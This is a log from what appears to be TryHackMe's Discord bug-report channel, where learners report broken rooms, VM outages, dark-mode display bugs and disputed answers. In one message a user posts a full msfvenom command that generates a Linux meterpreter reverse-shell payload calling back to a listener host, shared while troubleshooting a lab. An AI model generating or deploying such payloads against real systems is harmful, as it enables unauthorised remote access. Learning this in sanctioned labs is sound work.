Just had a chance to check this one and was able to spin up the target machine in ~2 to 3 minutes.

short pebble
#

@unborn pulsar, I pmd you, you might not see it since we aren't friends on discord but its in regards to my question above. I just wanted to check in with you on something if you can find the time. Thank you, if you can't I completely understand. I don't want to spoil a room here.

livid escarpBOT
#

Gave +1 Rep to @unborn pulsar (current: #12 - 726)

unborn pulsar
short pebble
ruby nymph
#

Can't connect to FlareVM

unborn pulsar
twilit flax
#

Very minor, but in Task 3 of Supply Chain Attack: Lottie (https://tryhackme.com/r/room/supplychainattacks), the malicious replacement code for index.js was copied twice into the terminal-container. I'm not a JS expert, though, so if there is some deep magic reason for this, let me know.

ruby nymph
misty patio
#

Recently for the past 2 days the target machines on a lot of rooms are going down quite alot it comes back up but still it's quite irritating that it goes down for a few minutes during the process so I've to start again

meager parcel
#

Missing a space in Task 1 of the Tutorial room

image.png
tacit vessel
#

no present port 6667 or service name irc in Task 5 in Nmap Basic Port Scans

image.png
verbal raft
spare mirage
tacit vessel
tacit vessel
#

Nmap Post Port Scan | Task 2

Missing space in between

image.png
spare mirage
tacit vessel
spare mirage
rotund peak
#

Hey everyone! Has anyone tried SOC Simulator I am having some issues with finding the logs in splunk for the alert. The date of the alert is 27/12/2024 there is no logs for this date. I can only see logs of the date 1/8/24 and yes date is set to All time

manic tartan
#

Bonjour

#

I need help

unborn pulsar
manic tartan
#

I am stuck on a question

#

What does BitDefenderFalx detect the file with the hash 2de70ca737c1f4602517c555ddd54165432cf231ffc0e21fb2e23b9dd14e7fb4 as?

#

on the room Search Skills

buoyant shoal
#

Love the new dark theme, but in commonlinuxprivesc I found a spot where some spans have an inline color style setting them black which makes it hard to see for dark theme, under Task 5 (eta: tasks 6, 8(one of the questions) and 9, also appear to have inline styles for the text color)

tame aurora
#

Day 8 of AOC gave me a Windows instead of Linux after I zoom in
I think it paired me to the wrong machine on full screen mode

spare mirage
tame aurora
spare mirage
tame aurora
#

Alright thanks

agile rampart
#

Not Able to submit the solution

Screenshot_2024-12-28_at_3.46.15_PM.png
fallen knot
#

@quaint sparrow bro not working πŸ₯²

spare mirage
agile rampart
spare mirage
pure mauve
#

The answer should be 253 not 63 πŸ₯²

image.png
quaint sparrow
#

No, the answer is 63.

spare mirage
quaint sparrow
#

^

pure mauve
#

maximum length? why does the para says 253

spare mirage
pure mauve
pure mauve
spare mirage
#

subdomain in this case is shop and it can't exceed 63 char. FQDN is shop.tryhackme.com and it can't exceed 253 chars πŸ™‚

pure mauve
#

my brain ain't braining

#

πŸ₯²

#

any video explaination? that you would recommennnd

spare mirage
pure mauve
pure mauve
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #5 - 1636)

teal mist
#

Room: Ice
Metasploit (in Attackbox) does not have a default payload set for this exploit so the room is missing a set payload step. Seems like it's an issue for some versions of Metasploit?

sharp topaz
#

Metasploit: Exploitation, Msfvenom, Get a meterpreter session on the target machine.

#

root@ip-10-10-x-x/# ./rev_shell.elf
Segmentation fault (core dumped)

#

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.13.x.x LPORT=8008 -f elf > rev_shell.elf

#

I am not sure if this is from me, or not. Any ideas?

#

Well, it was me.....

high eagle
#

Linux Fundamentals Part 2 task 4 the pro tip is all white in dark mode and we are unable to see the text

sturdy linden
spare mirage
#

Works fine for me 😦 . Which issue do you encounter ?

spare mirage
twin fern
spare mirage
twin fern
#

not yet lol

sturdy linden
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #5 - 1647)

tame aurora
#

I have no idea why, but if I finish using attack box in 30ish mins, terminate it, I cannot use it anymore on other aoc days. It is so weird.

spare mirage
tame aurora
#

Fair🫠

frigid quest
#

SOC Level 2 > Caldera

Target Machine VM has issues opening details on the Aurora events in the Event Viewer

image.png
wheat fractal
wheat fractal
glad pendant
#

Hello there, I found an annoying bug in this walkthrough section "https://tryhackme.com/r/room/searchskills" the issue was in task 4 where it asked "What is the top country with lighthttpd servers" I was supposed to use Shodan.io, however shodan says the top country using lighttpd servers is germany. The answer to this task was the United States, I had to de a search on previous peoples results to get through this task.

spare mirage
#

You probably typed lighthttpd instead of lighttpd

glad pendant
#

... Im an idiot, thanks for clearing that up 😫

spare mirage
glad pendant
#

Yeah, its an issue im trying to solve... i read to quickly and habitually skim read... my brain makes up things when I do this...

rugged tartan
icy inlet
#

I am having issue with the "Sysinternals" lab

#

The "Turn On Network Discovery" was selected and "Save Changes" was clicked, however when I open it up to check that it still does turn on.

image.png
#

It keeps setting it to "Turn off network discovery". There is no way for me to complete the lab without having this feature solved.

quaint sparrow
icy inlet
icy inlet
#

It still doesnt change even selecting "Turn on network discovery" and saving the changes in powershell with Administrator rights

image.png
#

Was any hardening policy enforced that is causing this behaviour in the lab?

#

I even ran PS cmd manually to set it but it still does not work.

image.png
radiant bane
#

Found some copy-paste redundant text in room https://tryhackme.com/r/room/solar
First Task 'CVE-2021-44228 Introduction'
"""
This vulnerability [...] offers remote code trivial remote code execution on hosts [...]
"""

#

Similar thing in room https://tryhackme.com/r/room/windowsforensics1 task 7 'Usage or knowledge of files/folders'
Part 'Offoce Recent Files:'
"""
[...] In such a scenario, the recent files can be found at the following location.

NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU

In such a scenario, the recent files can be found at the following location.
[...]
"""

dense tiger
#

dark issue in room fileinc

image.png
nocturne venture
#

Hello, I am in the room Enumeration & Brute Force, and the url http://enum.thm/labs/verbose_login/ to complete the task 3 does not seem to work. Any idea if the link is still valid ? Thank you !

pale marsh
proper root
#

I did the same room tonight and recognized it as well... it awarded me only 60 points

pale marsh
proper root
#

Yes, I recognized that as well... my guess was that they either changed it or the points are only awarded when the room is new

pale marsh
#

Ok, I understand. Thank you. Happy New Year

proper root
nocturne venture
livid escarpBOT
#

Gave +1 Rep to @proper root (current: #2532 - 1)

hoary cloud
#

hi
i can't submit my answer in this question for red team path , password attacks room :
What syntax would you use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?
answer :
Az”[0–9][0–9]” ^[!@]

sick kestrel
#

Dark Mode Issue in Wireshark Basics Room, Task 2. First table is fine, but the second table renders like so.

Screenshot_2024-12-30_at_11.35.21.png
rugged canyon
hoary cloud
spare mirage
#

Like @rugged canyon said your formatting is wrong πŸ™‚

#

Refresh the page before pasting

hoary cloud
#

thank you ! it worked

rugged canyon
hoary cloud
#

i can't believe this 🀣

spare mirage
rugged canyon
#

using the right quotes is important for commands

spare mirage
hoary cloud
#

this is my double quotes from my keyboard in english why this happening ?

spare mirage
hoary cloud
#

English/US

#

like what you said

#

i don't know really why this happened but thank you very much πŸ™‚ Love and respect to this community ❀️

spare mirage
#

Happy hacking πŸ™‚

lofty mason
#

i think i got a bug in the ssrf room task 2 nothing happens

#

when i change the url

round cove
#

Possible bug with the "File Inclusion" room. Lab3. Typing lab3 in the text field appears to create an endless loop and exhausts the resources of the server.

kind grail
#

Hello i get a "Parsing Error" on Day 4 in Advent of Cyber 2024 when i try to start the Machine, if i reload the page everything seems to be working but then i get a Connection Error

#

Anyone had the same Problems and know how to fix this?

spare mirage
kind grail
#

Already waited 2 hours :E

mossy panther
#

Having issues with the extending your network room, I completed the network simulator and got the flag but when i enter the flag into the question it tells me that the input is too short. I’ve tried refreshing, logging in and out, even tried a couple times over the past couple weeks

spare mirage
mossy panther
#

THM{You’ve_got_data}

#

Fills up all the

#

Available spaces and ive tried caps vs. no caps

spare mirage
mossy panther
#

Still not working

#

It just went through, thanks a ton. This has been annoying me for weeks

spare mirage
brave kiln
#

I got some sort of parsing error when trying to start a machine.. now I cant start it because I get this error, and it doesnt appear any are running that i can terminate!

#

"Oh no, an error occured while starting VM: You already have a machine running in this room. Terminate it before deploying another machine."

spare mirage
mellow citrus
#

Hello,

in the MAL: Strings the answer to the question

List the number of total transactions that the Bitcoin wallet used by the "Wannacry" author(s)

is no longer correct. There seem to have been 2 more transactions in the last two month

mystic bronze
#

Minor bug: In dark mode, the room "File Inclusion" shows some unreadable text paragraphs unless marking them.

storm shuttle
short pebble
#

This field does not exist in the database given (The 'category' field), there isn't a question around it, it's just in the explanation part, but I am not sure if that was intentional or not.

Screenshot_2024-12-31_at_6.50.34_AM.png
#

Also, I just read back just to make sure, never had you make this field. Just thought I would point that out.

#

Room is "SQL Fundamentals" Task 7

wraith obsidian
livid escarpBOT
#

Gave +1 Rep to @short pebble (current: #627 - 8)

wraith obsidian
wraith obsidian
livid escarpBOT
#

Gave +1 Rep to @mellow citrus (current: #2536 - 1)

wraith obsidian
kind grail
clear talon
#

im having no vms running but still it says i have an error

kind grail
#

The VM seems to be running after a reload but i cant connect to it

clear talon
#

yea same problem

#

the attackbox is working though

#

weird

wraith obsidian
#

The VM issues you see @clear talon @kind grail are being investigated by the platform team. Don't have much info on what it is yet. Sorry for the hassle.

clear talon
#

No problem. Please let us know once its fixed. Ive already sent a ticket as well

wraith obsidian
#

@clear talon @kind grail Can you try now?

agile rampart
#

I am having this problem still

Screenshot_2024-12-31_at_9.20.48_PM.png
clear talon
#

same

wraith obsidian
#

@clear talon @agile rampart Try now, may need to terminate any running vms and start new vm. Seems like it was a capacity issue on last day of AoC.

agile rampart
livid escarpBOT
#

Gave +1 Rep to @wraith obsidian (current: #764 - 6)

swift quiver
#

In the room https://tryhackme.com/r/room/activerecon, Task 3, the last question tells you to run this command "ping -c 10 10.10.153.106" and asks how many ping replies did you get back?

The answer format is **

The answer format and "-c 10" gives away the answer without having to run the command.

I understand that sometimes Questions are straight forward, but for someone learning the first time, the -c should be more than 10 so it invites the learner to run the command to get the answer.

TryHackMe
Active Reconnaissance

Learn how to use simple tools such as traceroute, ping, telnet, and a web browser to gather information.